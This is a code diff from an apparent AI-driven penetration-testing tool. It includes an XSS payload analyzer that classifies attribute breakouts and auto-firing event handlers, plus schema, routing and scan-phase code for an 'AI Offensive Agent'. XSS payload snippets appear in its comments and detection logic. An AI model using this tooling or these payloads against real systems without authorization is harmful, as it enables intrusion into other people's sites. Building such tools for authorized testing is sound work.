pat = rf'{evt}\s*='
if re.search(pat, payload_lower):
if evt == "onfocus" and has_autofocus:
result.update({
"executable": True,
"interactive": False,
"context": "attribute_breakout_auto",
"confidence": 0.95,
"detail": f"Payload breaks attribute to create {evt}+autofocus on <{tag_name}> (auto-fires)",
})
return result
elif evt in AUTO_FIRE_EVENTS:
result.update({
"executable": True,
"interactive": False,
"context": "attribute_breakout_auto",
"confidence": 0.90,
"detail": f"Payload breaks attribute to create auto-firing {evt} on <{tag_name}>",
})
return result
else:
result.update({
"executable": False,
"interactive": True,
"context": "attribute_breakout_event",
"confidence": 0.90,
"detail": f"Payload breaks attribute to create {evt} on <{tag_name}> (requires interaction)",
})
return result
# Inside a regular attribute value (not event handler, not JS URI)
result.update({
"context": "attribute_value",
"confidence": 0.3,
"detail": f"Payload inside non-event attribute of <{tag_name}>",
})
return result
# --- Check 7: Payload contains event handler patterns but is in text content ---
# (e.g., "onclick=alert(1)" as literal text, NOT inside a tag)
# This is NOT executable — it's just text
# --- Check 8: Plain text content ---
result.update({
"context": "text_content",
"confidence": 0.2,
"detail": "Payload reflected as plain text content in HTML body",
})
return result
def _payload_breaks_js_string(js_before: str, payload: str) -> bool:
"""Check if payload breaks out of a JS string context."""
# Look for string delimiters just before payload
stripped = js_before.rstrip()
if not stripped:
return False
# Payload starts with string terminator + code
p = payload.lstrip()
if p and p[0] in ("'", '"', '`'):
return True
# Payload contains </script>
if "</script>" in payload.lower():
return True
return False
def _payload_creates_event(payload_lower: str) -> bool:
"""Check if payload string creates an event handler (attribute breakout)."""
for evt in ALL_EVENTS:
if evt in payload_lower and "=" in payload_lower:
# e.g., " onfocus=alert(1) autofocus x="
pat = rf'{evt}\s*='
if re.search(pat, payload_lower):
return True
return False
def _analyze_injected_tag(payload: str, payload_lower: str, result: Dict) -> Dict:
"""Analyze a payload that introduces new HTML tags."""
# Extract tags from payload
tags = re.findall(r'<(\w+)', payload_lower)
if not tags:
result.update({
"context": "text_content",
"confidence": 0.3,
"detail": "Payload contains < but no recognizable tags",
})
return result
primary_tag = tags[0]
# <script> tag = auto-execute
if "script" in tags:
result.update({
"executable": True,
"context": "injected_script_tag",
"confidence": 0.95,
"detail": f"Payload injects <script> tag",
})
return result
# Check for event handlers in the payload
events_in_payload = set()
for m in _RE_EVENT_ATTR.finditer(payload_lower):
events_in_payload.add(m.group(1).lower())
auto_events = events_in_payload & AUTO_FIRE_EVENTS
interactive_events = events_in_payload & INTERACTIVE_EVENTS
# Check for autofocus (makes onfocus auto-fire)
has_autofocus = "autofocus" in payload_lower
if has_autofocus and "onfocus" in events_in_payload:
auto_events.add("onfocus")
interactive_events.discard("onfocus")
# Check for <details open ontoggle>
if "details" in tags and "open" in payload_lower and "ontoggle" in events_in_payload:
auto_events.add("ontoggle")
interactive_events.discard("ontoggle")
# img/video/audio with src=x onerror → auto-fires
if primary_tag in ("img", "video", "audio", "source", "object", "embed", "input"):
if "onerror" in events_in_payload and ("src=" in payload_lower or "src =" in payload_lower):
auto_events.add("onerror")
interactive_events.discard("onerror")
# svg/body onload → auto-fires
if primary_tag in ("svg", "body", "math") and "onload" in events_in_payload:
auto_events.add("onload")
interactive_events.discard("onload")
# SVG animate/set onbegin → auto-fires
if primary_tag in ("animate", "animatetransform", "set", "discard") and "onbegin" in events_in_payload:
auto_events.add("onbegin")
interactive_events.discard("onbegin")
# javascript: URI
if "javascript:" in payload_lower:
result.update({
"executable": False,
"interactive": True,
"context": "injected_js_uri",
"confidence": 0.90,
"detail": f"Payload injects <{primary_tag}> with javascript: URI",
})
return result
if auto_events:
result.update({
"executable": True,
"interactive": False,
"context": "injected_tag_auto",
"confidence": 0.95,
"detail": f"Payload injects <{primary_tag}> with auto-firing event(s): {', '.join(auto_events)}",
})
return result
if interactive_events:
result.update({
"executable": False,
"interactive": True,
"context": "injected_tag_interactive",
"confidence": 0.85,
"detail": f"Payload injects <{primary_tag}> with interactive event(s): {', '.join(interactive_events)}",
})
return result
# Tag injected but no events
result.update({
"context": "injected_tag_no_event",
"confidence": 0.4,
"detail": f"Payload injects <{primary_tag}> but without executable event handlers",
})
return result
+70
View File
@@ -87,6 +87,30 @@ async def _run_migrations(conn):
logger.info("Adding 'poc_evidence' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN poc_evidence TEXT"))
if "screenshots" not in columns:
logger.info("Adding 'screenshots' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN screenshots JSON DEFAULT '[]'"))
if "url" not in columns:
logger.info("Adding 'url' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN url TEXT"))
if "parameter" not in columns:
logger.info("Adding 'parameter' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN parameter VARCHAR(500)"))
if "validation_status" not in columns:
logger.info("Adding 'validation_status' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN validation_status VARCHAR(20) DEFAULT 'ai_confirmed'"))
if "ai_rejection_reason" not in columns:
logger.info("Adding 'ai_rejection_reason' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN ai_rejection_reason TEXT"))
if "poc_code" not in columns:
logger.info("Adding 'poc_code' column to vulnerabilities table...")
await conn.execute(text("ALTER TABLE vulnerabilities ADD COLUMN poc_code TEXT"))
# Check if agent_tasks table exists
result = await conn.execute(
text("SELECT name FROM sqlite_master WHERE type='table' AND name='agent_tasks'")
@@ -142,6 +166,52 @@ async def _run_migrations(conn):
"""))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vulnerability_tests_scan_id ON vulnerability_tests(scan_id)"))
# Check if vuln_lab_challenges table exists
result = await conn.execute(
text("SELECT name FROM sqlite_master WHERE type='table' AND name='vuln_lab_challenges'")
)
if not result.fetchone():
logger.info("Creating 'vuln_lab_challenges' table...")
await conn.execute(text("""
CREATE TABLE vuln_lab_challenges (
id VARCHAR(36) PRIMARY KEY,
target_url TEXT NOT NULL,
challenge_name VARCHAR(255),
vuln_type VARCHAR(100) NOT NULL,
vuln_category VARCHAR(50),
auth_type VARCHAR(20),
auth_value TEXT,
status VARCHAR(20) DEFAULT 'pending',
result VARCHAR(20),
agent_id VARCHAR(36),
scan_id VARCHAR(36),
findings_count INTEGER DEFAULT 0,
critical_count INTEGER DEFAULT 0,
high_count INTEGER DEFAULT 0,
medium_count INTEGER DEFAULT 0,
low_count INTEGER DEFAULT 0,
info_count INTEGER DEFAULT 0,
findings_detail JSON DEFAULT '[]',
started_at DATETIME,
completed_at DATETIME,
duration INTEGER,
notes TEXT,
logs JSON DEFAULT '[]',
endpoints_count INTEGER DEFAULT 0,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP
)
"""))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vuln_lab_status ON vuln_lab_challenges(status)"))
await conn.execute(text("CREATE INDEX IF NOT EXISTS idx_vuln_lab_vuln_type ON vuln_lab_challenges(vuln_type)"))
else:
# Migrate existing table - add new columns if missing
result = await conn.execute(text("PRAGMA table_info(vuln_lab_challenges)"))
columns = [row[1] for row in result.fetchall()]
if "logs" not in columns:
await conn.execute(text("ALTER TABLE vuln_lab_challenges ADD COLUMN logs JSON DEFAULT '[]'"))
if "endpoints_count" not in columns:
await conn.execute(text("ALTER TABLE vuln_lab_challenges ADD COLUMN endpoints_count INTEGER DEFAULT 0"))
logger.info("Database migrations completed")
except Exception as e:
logger.warning(f"Migration check failed (may be normal on first run): {e}")
+41 -1
View File
@@ -11,7 +11,7 @@ from pathlib import Path
from backend.config import settings
from backend.db.database import init_db, close_db
from backend.api.v1 import scans, targets, prompts, reports, dashboard, vulnerabilities, settings as settings_router, agent, agent_tasks
from backend.api.v1 import scans, targets, prompts, reports, dashboard, vulnerabilities, settings as settings_router, agent, agent_tasks, scheduler, vuln_lab, terminal, sandbox
from backend.api.websocket import manager as ws_manager
@@ -23,9 +23,45 @@ async def lifespan(app: FastAPI):
await init_db()
print("Database initialized")
# Initialize scheduler
try:
import json
config_path = Path(__file__).parent.parent / "config" / "config.json"
if config_path.exists():
with open(config_path) as f:
config = json.load(f)
from core.scheduler import ScanScheduler
scan_scheduler = ScanScheduler(config)
scan_scheduler.start()
app.state.scheduler = scan_scheduler
print(f"Scheduler initialized (enabled={scan_scheduler.enabled})")
else:
app.state.scheduler = None
except Exception as e:
print(f"Scheduler init skipped: {e}")
app.state.scheduler = None
# Cleanup orphan sandbox containers from previous crashes
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_orphans()
print("Sandbox pool initialized (orphan cleanup done)")
except Exception as e:
print(f"Sandbox pool init skipped: {e}")
yield
# Shutdown
# Destroy all per-scan sandbox containers
try:
from core.container_pool import get_pool
await get_pool().cleanup_all()
print("Sandbox containers cleaned up")
except Exception:
pass
if hasattr(app.state, 'scheduler') and app.state.scheduler:
app.state.scheduler.stop()
print("Shutting down...")
await close_db()
@@ -60,6 +96,10 @@ app.include_router(vulnerabilities.router, prefix="/api/v1/vulnerabilities", tag
app.include_router(settings_router.router, prefix="/api/v1/settings", tags=["Settings"])
app.include_router(agent.router, prefix="/api/v1/agent", tags=["AI Agent"])
app.include_router(agent_tasks.router, prefix="/api/v1/agent-tasks", tags=["Agent Tasks"])
app.include_router(scheduler.router, prefix="/api/v1/scheduler", tags=["Scheduler"])
app.include_router(vuln_lab.router, prefix="/api/v1/vuln-lab", tags=["Vulnerability Lab"])
app.include_router(terminal.router, prefix="/api/v1/terminal", tags=["Terminal Agent"])
app.include_router(sandbox.router, prefix="/api/v1/sandbox", tags=["Sandbox"])
@app.get("/api/health")
+3 -1
View File
@@ -5,6 +5,7 @@ from backend.models.endpoint import Endpoint
from backend.models.vulnerability import Vulnerability, VulnerabilityTest
from backend.models.report import Report
from backend.models.agent_task import AgentTask
from backend.models.vuln_lab import VulnLabChallenge
__all__ = [
"Scan",
@@ -14,5 +15,6 @@ __all__ = [
"Vulnerability",
"VulnerabilityTest",
"Report",
"AgentTask"
"AgentTask",
"VulnLabChallenge"
]
+94
View File
@@ -0,0 +1,94 @@
"""
NeuroSploit v3 - Vulnerability Lab Challenge Model
Tracks isolated vulnerability testing sessions (labs, CTFs, PortSwigger, etc.)
"""
from datetime import datetime
from typing import Optional, List
from sqlalchemy import String, Integer, Float, Boolean, DateTime, Text, JSON, ForeignKey
from sqlalchemy.orm import Mapped, mapped_column
from backend.db.database import Base
import uuid
class VulnLabChallenge(Base):
"""Individual vulnerability lab/challenge test record"""
__tablename__ = "vuln_lab_challenges"
id: Mapped[str] = mapped_column(String(36), primary_key=True, default=lambda: str(uuid.uuid4()))
# Target info
target_url: Mapped[str] = mapped_column(Text)
challenge_name: Mapped[Optional[str]] = mapped_column(String(255), nullable=True)
# Vulnerability scope
vuln_type: Mapped[str] = mapped_column(String(100)) # e.g. xss_reflected, sqli_union
vuln_category: Mapped[Optional[str]] = mapped_column(String(50), nullable=True) # injection, auth, client_side, etc.
# Authentication
auth_type: Mapped[Optional[str]] = mapped_column(String(20), nullable=True) # cookie, bearer, basic, header
auth_value: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Execution state
status: Mapped[str] = mapped_column(String(20), default="pending") # pending, running, completed, failed, stopped
result: Mapped[Optional[str]] = mapped_column(String(20), nullable=True) # detected, not_detected, error
# Agent linkage
agent_id: Mapped[Optional[str]] = mapped_column(String(36), nullable=True)
scan_id: Mapped[Optional[str]] = mapped_column(String(36), nullable=True)
# Results
findings_count: Mapped[int] = mapped_column(Integer, default=0)
critical_count: Mapped[int] = mapped_column(Integer, default=0)
high_count: Mapped[int] = mapped_column(Integer, default=0)
medium_count: Mapped[int] = mapped_column(Integer, default=0)
low_count: Mapped[int] = mapped_column(Integer, default=0)
info_count: Mapped[int] = mapped_column(Integer, default=0)
# Findings detail (JSON list of finding summaries)
findings_detail: Mapped[List] = mapped_column(JSON, default=list)
# Timing
started_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True)
completed_at: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True)
duration: Mapped[Optional[int]] = mapped_column(Integer, nullable=True) # seconds
# Notes
notes: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Logs (JSON list of log entries persisted after completion)
logs: Mapped[List] = mapped_column(JSON, default=list)
# Endpoints discovered count
endpoints_count: Mapped[int] = mapped_column(Integer, default=0)
# Timestamps
created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow)
def to_dict(self) -> dict:
return {
"id": self.id,
"target_url": self.target_url,
"challenge_name": self.challenge_name,
"vuln_type": self.vuln_type,
"vuln_category": self.vuln_category,
"auth_type": self.auth_type,
"status": self.status,
"result": self.result,
"agent_id": self.agent_id,
"scan_id": self.scan_id,
"findings_count": self.findings_count,
"critical_count": self.critical_count,
"high_count": self.high_count,
"medium_count": self.medium_count,
"low_count": self.low_count,
"info_count": self.info_count,
"findings_detail": self.findings_detail or [],
"started_at": self.started_at.isoformat() if self.started_at else None,
"completed_at": self.completed_at.isoformat() if self.completed_at else None,
"duration": self.duration,
"notes": self.notes,
"logs": self.logs or [],
"endpoints_count": self.endpoints_count,
"created_at": self.created_at.isoformat() if self.created_at else None,
}
+21
View File
@@ -87,6 +87,21 @@ class Vulnerability(Base):
# AI Analysis
ai_analysis: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# PoC Code (executable proof-of-concept: HTML, Python, curl, etc.)
poc_code: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Screenshots (list of base64 data URIs or filesystem paths)
screenshots: Mapped[List] = mapped_column(JSON, default=list)
# Source URL and parameter (for finding_id reconstruction)
url: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
parameter: Mapped[Optional[str]] = mapped_column(String(500), nullable=True)
# Validation status (manual review workflow)
validation_status: Mapped[str] = mapped_column(String(20), default="ai_confirmed")
# Values: "ai_confirmed" | "ai_rejected" | "validated" | "false_positive" | "pending_review"
ai_rejection_reason: Mapped[Optional[str]] = mapped_column(Text, nullable=True)
# Timestamps
created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow)
@@ -116,5 +131,11 @@ class Vulnerability(Base):
"remediation": self.remediation,
"references": self.references,
"ai_analysis": self.ai_analysis,
"poc_code": self.poc_code,
"screenshots": self.screenshots or [],
"url": self.url,
"parameter": self.parameter,
"validation_status": self.validation_status or "ai_confirmed",
"ai_rejection_reason": self.ai_rejection_reason,
"created_at": self.created_at.isoformat() if self.created_at else None
}
+3
View File
@@ -23,6 +23,9 @@ python-jose[cryptography]>=3.3.0
jinja2>=3.1.0
weasyprint>=60.0; platform_system != "Windows"
# Scheduling
apscheduler>=3.10.0
# Development
httpx>=0.26.0
pytest>=7.4.0
+319 -213
View File
@@ -29,6 +29,39 @@ from backend.core.vuln_engine.engine import DynamicVulnerabilityEngine
from backend.core.vuln_engine.payload_generator import PayloadGenerator
from backend.core.autonomous_scanner import AutonomousScanner
from backend.core.ai_pentest_agent import AIPentestAgent
from backend.core.ai_prompt_processor import TestingPlan
# Phase control: signaling between API and running background tasks
_scan_phase_control: Dict[str, str] = {} # scan_id → target_phase
PHASE_ORDER = ["initializing", "recon", "analyzing", "testing", "completed"]
def skip_to_phase(scan_id: str, target_phase: str) -> bool:
"""Signal a running scan to skip ahead to the given phase."""
if target_phase not in PHASE_ORDER:
return False
_scan_phase_control[scan_id] = target_phase
return True
def _default_skip_plan() -> "TestingPlan":
"""Default testing plan used when analysis phase is skipped."""
return TestingPlan(
vulnerability_types=[
"xss_reflected", "sqli_error", "sqli_blind", "command_injection",
"lfi", "path_traversal", "ssrf", "auth_bypass", "idor",
"cors_misconfiguration", "open_redirect", "missing_security_headers",
"rfi", "csrf", "xxe", "ssti"
],
testing_focus=["Comprehensive vulnerability assessment (analysis phase skipped)"],
custom_payloads=[],
testing_depth="medium",
specific_endpoints=[],
bypass_techniques=[],
priority_order=["SQL Injection", "XSS", "Command Injection", "SSRF", "Authentication"],
ai_reasoning="Default testing plan - AI analysis phase was skipped by user"
)
# Global authorization message for AI
@@ -72,6 +105,21 @@ class ScanService:
self.payload_generator = PayloadGenerator()
self._stop_requested = False
def _should_skip_phase(self, scan_id: str, current_phase: str) -> Optional[str]:
"""Check if the scan should skip ahead to a different phase.
Returns the target phase if skip is needed, None otherwise."""
target = _scan_phase_control.pop(scan_id, None)
if not target:
return None
try:
cur_idx = PHASE_ORDER.index(current_phase)
tgt_idx = PHASE_ORDER.index(target)
if tgt_idx > cur_idx:
return target
except ValueError:
pass
return None
async def _create_agent_task(
self,
scan_id: str,
@@ -192,7 +240,19 @@ class ScanService:
# Phase 1: REAL Reconnaissance (if enabled)
recon_data = {}
if scan.recon_enabled:
skip_target = self._should_skip_phase(scan_id, "initializing")
recon_skipped = False
if skip_target:
# User requested skip from initializing
skip_idx = PHASE_ORDER.index(skip_target)
if skip_idx >= PHASE_ORDER.index("recon"):
recon_skipped = True
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: Reconnaissance (user request)")
await ws_manager.broadcast_phase_change(scan_id, "recon_skipped")
scan.recon_enabled = False
if scan.recon_enabled and not recon_skipped:
scan.current_phase = "recon"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "recon")
@@ -356,247 +416,293 @@ class ScanService:
await self.db.commit()
await ws_manager.broadcast_log(scan_id, "info", f"Autonomous discovery complete. Total endpoints: {scan.total_endpoints}")
# Phase 2: AI Prompt Processing
scan.current_phase = "analyzing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "analyzing")
await ws_manager.broadcast_progress(scan_id, 40, "AI analyzing prompt and data...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 2: AI ANALYSIS")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Check for phase skip before analysis
skip_target = self._should_skip_phase(scan_id, "recon") or (skip_target if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("analyzing") else None)
analysis_skipped = False
testing_plan = None
# Create AI analysis task
analysis_task = await self._create_agent_task(
scan_id=scan_id,
task_type="analysis",
task_name="AI Strategy Analysis",
if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("analyzing"):
analysis_skipped = True
testing_plan = _default_skip_plan()
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: AI Analysis (user request)")
await ws_manager.broadcast_log(scan_id, "info", f"Using default testing plan with {len(testing_plan.vulnerability_types)} vulnerability types")
await ws_manager.broadcast_phase_change(scan_id, "analyzing_skipped")
if skip_target == "completed":
# User wants to skip everything - finalize
self._stop_requested = True
if not analysis_skipped:
# Phase 2: AI Prompt Processing
scan.current_phase = "analyzing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "analyzing")
await ws_manager.broadcast_progress(scan_id, 40, "AI analyzing prompt and data...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 2: AI ANALYSIS")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
if not analysis_skipped:
# Create AI analysis task
analysis_task = await self._create_agent_task(
scan_id=scan_id,
task_type="analysis",
task_name="AI Strategy Analysis",
description="Analyzing prompt and recon data to determine testing strategy",
tool_name="ai_prompt_processor",
tool_category="ai"
)
try:
# Enhance prompt with authorization
enhanced_prompt = f"{GLOBAL_AUTHORIZATION}\n\nUSER REQUEST:\n{prompt_content}"
try:
# Enhance prompt with authorization
enhanced_prompt = f"{GLOBAL_AUTHORIZATION}\n\nUSER REQUEST:\n{prompt_content}"
# Get AI-generated testing plan
await ws_manager.broadcast_log(scan_id, "info", "AI processing prompt and determining attack strategy...")
# Get AI-generated testing plan
await ws_manager.broadcast_log(scan_id, "info", "AI processing prompt and determining attack strategy...")
testing_plan = await self.ai_processor.process_prompt(
prompt=enhanced_prompt,
recon_data=recon_data,
target_info={"targets": [t.url for t in targets]}
)
testing_plan = await self.ai_processor.process_prompt(
prompt=enhanced_prompt,
recon_data=recon_data,
target_info={"targets": [t.url for t in targets]}
)
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "AI TESTING PLAN:")
await ws_manager.broadcast_log(scan_id, "info", f" Vulnerability Types: {', '.join(testing_plan.vulnerability_types[:10])}")
if len(testing_plan.vulnerability_types) > 10:
await ws_manager.broadcast_log(scan_id, "info", f" ... and {len(testing_plan.vulnerability_types) - 10} more types")
await ws_manager.broadcast_log(scan_id, "info", f" Testing Focus: {', '.join(testing_plan.testing_focus[:5])}")
await ws_manager.broadcast_log(scan_id, "info", f" Depth: {testing_plan.testing_depth}")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", f"AI Reasoning: {testing_plan.ai_reasoning[:300]}...")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "AI TESTING PLAN:")
await ws_manager.broadcast_log(scan_id, "info", f" Vulnerability Types: {', '.join(testing_plan.vulnerability_types[:10])}")
if len(testing_plan.vulnerability_types) > 10:
await ws_manager.broadcast_log(scan_id, "info", f" ... and {len(testing_plan.vulnerability_types) - 10} more types")
await ws_manager.broadcast_log(scan_id, "info", f" Testing Focus: {', '.join(testing_plan.testing_focus[:5])}")
await ws_manager.broadcast_log(scan_id, "info", f" Depth: {testing_plan.testing_depth}")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", f"AI Reasoning: {testing_plan.ai_reasoning[:300]}...")
await self._complete_agent_task(
analysis_task,
items_processed=1,
items_found=len(testing_plan.vulnerability_types),
summary=f"Generated testing plan with {len(testing_plan.vulnerability_types)} vulnerability types"
)
except Exception as e:
await self._fail_agent_task(analysis_task, str(e))
raise
await self._complete_agent_task(
analysis_task,
items_processed=1,
items_found=len(testing_plan.vulnerability_types),
summary=f"Generated testing plan with {len(testing_plan.vulnerability_types)} vulnerability types"
)
except Exception as e:
await self._fail_agent_task(analysis_task, str(e))
raise
# Ensure testing_plan exists (either from AI or default skip plan)
if testing_plan is None:
testing_plan = _default_skip_plan()
await ws_manager.broadcast_progress(scan_id, 45, f"Testing {len(testing_plan.vulnerability_types)} vuln types")
# Phase 3: AI OFFENSIVE AGENT
scan.current_phase = "testing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "testing")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 3: AI OFFENSIVE AGENT")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Run the AI Offensive Agent for each target
for target in targets:
await ws_manager.broadcast_log(scan_id, "info", f"Deploying AI Agent on: {target.url}")
# Create AI pentest agent task
agent_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name=f"AI Pentest Agent: {target.hostname or target.url[:30]}",
description=f"AI-powered penetration testing on {target.url}",
tool_name="ai_pentest_agent",
tool_category="ai"
)
try:
# Create log callback for the agent
async def agent_log(level: str, message: str):
await ws_manager.broadcast_log(scan_id, level, message)
# Build auth headers
auth_headers = self._build_auth_headers(scan)
findings_count = 0
endpoints_tested = 0
async with AIPentestAgent(
target=target.url,
log_callback=agent_log,
auth_headers=auth_headers,
max_depth=5
) as agent:
agent_report = await agent.run()
# Save agent findings as vulnerabilities
for finding in agent_report.get("findings", []):
finding_severity = finding["severity"]
vuln = Vulnerability(
scan_id=scan_id,
title=f"{finding['type'].upper()} - {finding['endpoint'][:50]}",
vulnerability_type=finding["type"],
severity=finding_severity,
description=finding["evidence"],
affected_endpoint=finding["endpoint"],
poc_payload=finding["payload"],
poc_request=finding.get("raw_request", "")[:5000],
poc_response=finding.get("raw_response", "")[:5000],
remediation=finding.get("impact", ""),
ai_analysis="\n".join(finding.get("exploitation_steps", []))
)
self.db.add(vuln)
await self.db.flush() # Ensure ID is assigned
findings_count += 1
# Increment vulnerability count
await self._increment_vulnerability_count(scan, finding_severity)
await ws_manager.broadcast_vulnerability_found(scan_id, {
"id": vuln.id,
"title": vuln.title,
"severity": vuln.severity,
"type": finding["type"],
"endpoint": finding["endpoint"]
})
# Update endpoint count
endpoints_tested = agent_report.get("summary", {}).get("total_endpoints", 0)
scan.total_endpoints += endpoints_tested
await self._complete_agent_task(
agent_task,
items_processed=endpoints_tested,
items_found=findings_count,
summary=f"Tested {endpoints_tested} endpoints, found {findings_count} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(agent_task, str(e))
# Check for phase skip before testing
skip_target = self._should_skip_phase(scan_id, "analyzing")
testing_skipped = False
if skip_target and PHASE_ORDER.index(skip_target) >= PHASE_ORDER.index("testing"):
if skip_target == "completed":
testing_skipped = True
self._stop_requested = True
await ws_manager.broadcast_log(scan_id, "warning", "")
await ws_manager.broadcast_log(scan_id, "warning", ">> PHASE SKIPPED: Testing (user request - jumping to completion)")
await ws_manager.broadcast_phase_change(scan_id, "testing_skipped")
if not testing_skipped:
# Phase 3: AI OFFENSIVE AGENT
scan.current_phase = "testing"
await self.db.commit()
await ws_manager.broadcast_phase_change(scan_id, "testing")
await ws_manager.broadcast_log(scan_id, "info", "")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
await ws_manager.broadcast_log(scan_id, "info", "PHASE 3: AI OFFENSIVE AGENT")
await ws_manager.broadcast_log(scan_id, "info", "=" * 40)
# Continue with additional AI-driven testing
# Get all endpoints to test
endpoints_result = await self.db.execute(
select(Endpoint).where(Endpoint.scan_id == scan_id)
)
endpoints = list(endpoints_result.scalars().all())
# Add URLs from recon as endpoints
for url in recon_data.get("urls", [])[:100]: # Test up to 100 URLs
if "?" in url and url not in [e.url for e in endpoints]:
endpoint = Endpoint(
scan_id=scan_id,
url=url,
method="GET",
path=url.split("?")[0].split("/")[-1] if "/" in url else "/"
)
self.db.add(endpoint)
endpoints.append(endpoint)
await self.db.commit()
# If STILL no endpoints, create from targets with common paths
if not endpoints:
await ws_manager.broadcast_log(scan_id, "warning", "No endpoints found. Creating test endpoints from targets...")
common_paths = [
"/", "/login", "/admin", "/api", "/search", "/user",
"/?id=1", "/?page=1", "/?q=test", "/?search=test"
]
# Run the AI Offensive Agent for each target
for target in targets:
for path in common_paths:
url = target.url.rstrip("/") + path
await ws_manager.broadcast_log(scan_id, "info", f"Deploying AI Agent on: {target.url}")
# Create AI pentest agent task
agent_task = await self._create_agent_task(
scan_id=scan_id,
task_type="testing",
task_name=f"AI Pentest Agent: {target.hostname or target.url[:30]}",
description=f"AI-powered penetration testing on {target.url}",
tool_name="ai_pentest_agent",
tool_category="ai"
)
try:
# Create log callback for the agent
async def agent_log(level: str, message: str):
await ws_manager.broadcast_log(scan_id, level, message)
# Build auth headers
auth_headers = self._build_auth_headers(scan)
findings_count = 0
endpoints_tested = 0
async with AIPentestAgent(
target=target.url,
log_callback=agent_log,
auth_headers=auth_headers,
max_depth=5
) as agent:
agent_report = await agent.run()
# Save agent findings as vulnerabilities
for finding in agent_report.get("findings", []):
finding_severity = finding["severity"]
vuln = Vulnerability(
scan_id=scan_id,
title=f"{finding['type'].upper()} - {finding['endpoint'][:50]}",
vulnerability_type=finding["type"],
severity=finding_severity,
description=finding["evidence"],
affected_endpoint=finding["endpoint"],
poc_payload=finding["payload"],
poc_request=finding.get("raw_request", "")[:5000],
poc_response=finding.get("raw_response", "")[:5000],
remediation=finding.get("impact", ""),
ai_analysis="\n".join(finding.get("exploitation_steps", []))
)
self.db.add(vuln)
await self.db.flush() # Ensure ID is assigned
findings_count += 1
# Increment vulnerability count
await self._increment_vulnerability_count(scan, finding_severity)
await ws_manager.broadcast_vulnerability_found(scan_id, {
"id": vuln.id,
"title": vuln.title,
"severity": vuln.severity,
"type": finding["type"],
"endpoint": finding["endpoint"]
})
# Update endpoint count
endpoints_tested = agent_report.get("summary", {}).get("total_endpoints", 0)
scan.total_endpoints += endpoints_tested
await self._complete_agent_task(
agent_task,
items_processed=endpoints_tested,
items_found=findings_count,
summary=f"Tested {endpoints_tested} endpoints, found {findings_count} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(agent_task, str(e))
await self.db.commit()
# Continue with additional AI-driven testing
# Get all endpoints to test
endpoints_result = await self.db.execute(
select(Endpoint).where(Endpoint.scan_id == scan_id)
)
endpoints = list(endpoints_result.scalars().all())
# Add URLs from recon as endpoints
for url in recon_data.get("urls", [])[:100]: # Test up to 100 URLs
if "?" in url and url not in [e.url for e in endpoints]:
endpoint = Endpoint(
scan_id=scan_id,
target_id=target.id,
url=url,
method="GET",
path=path
path=url.split("?")[0].split("/")[-1] if "/" in url else "/"
)
self.db.add(endpoint)
endpoints.append(endpoint)
scan.total_endpoints += 1
await self.db.commit()
await ws_manager.broadcast_log(scan_id, "info", f"Testing {len(endpoints)} endpoints for {len(testing_plan.vulnerability_types)} vuln types")
await ws_manager.broadcast_log(scan_id, "info", "")
# If STILL no endpoints, create from targets with common paths
if not endpoints:
await ws_manager.broadcast_log(scan_id, "warning", "No endpoints found. Creating test endpoints from targets...")
common_paths = [
"/", "/login", "/admin", "/api", "/search", "/user",
"/?id=1", "/?page=1", "/?q=test", "/?search=test"
]
for target in targets:
for path in common_paths:
url = target.url.rstrip("/") + path
endpoint = Endpoint(
scan_id=scan_id,
target_id=target.id,
url=url,
method="GET",
path=path
)
self.db.add(endpoint)
endpoints.append(endpoint)
scan.total_endpoints += 1
